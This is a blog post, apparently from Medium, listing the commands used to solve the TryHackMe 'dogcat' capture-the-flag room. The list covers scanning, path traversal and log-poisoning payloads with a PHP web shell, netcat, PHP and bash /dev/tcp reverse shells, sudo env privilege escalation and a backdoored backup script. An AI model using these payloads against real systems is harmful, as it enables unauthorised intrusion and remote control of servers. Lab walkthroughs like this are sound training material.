TryHackMe: dogcat

nmap -Pn <ip>
nmap -A -p 22,80 <ip>
nmap --script vuln -p 22,80 <ip>
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html
http://<ip>/?view=./dog/../../../../../../../../../../../../../etc/passwd
http://<ip>/?view=php://filter/convert.base64-encode/resource=./dog../../index
http://<ip>/?view=./dog../../../../../../../../etc/passwd&ext=
http://<ip>/?view=./dog../../../../../../../../var/log/apache2/access.log&ext=
 <?php system($_GET['cmd']); ?>
/?view=./dog../../../../../../../../var/log/apache2/access.log&ext=id
nc -lvp 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
pwdlscat flag.php
cd ..ls
cat flag2_QMW7JvaY2LvK.txt
cd /homelsls -la
sudo env /bin/shid
cd /rootlscat flag3.txt
cd /tmpls
cd /optls -la
cd backupsls -la
cat backup.sh
nc -lvp 1235
echo "#!/bin/bash" > backup.shecho "/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1235 0>&1'" >> backup.sh
ls
cat flag4.txt

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Simple EDA tool to generate automatic HTML report

MQTT 5.0 — Introduction to the publish-subscribe mode

Why do we keep pointing bugs?

IF YOUhttps://nytimes.one/if-you-pick-your-nose-you-should-probably-stop-now-this-is-how-dangerous-i

Performance impact of dynamic vs strictly typed language — Javascript vs F#

Write your own programming Language over a weekend.

Two Webinars to Help Governments Get the Most Out of Amanda

Clocks — CSS Animation

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ratiros01

ratiros01

OSCP

More from Medium

Project 8: ESP32 Web Server

Launch Container Without Using Docker Tool .

Cracking password protected Zip file using John The Ripper:-

Introduction to Automation framework using Pytest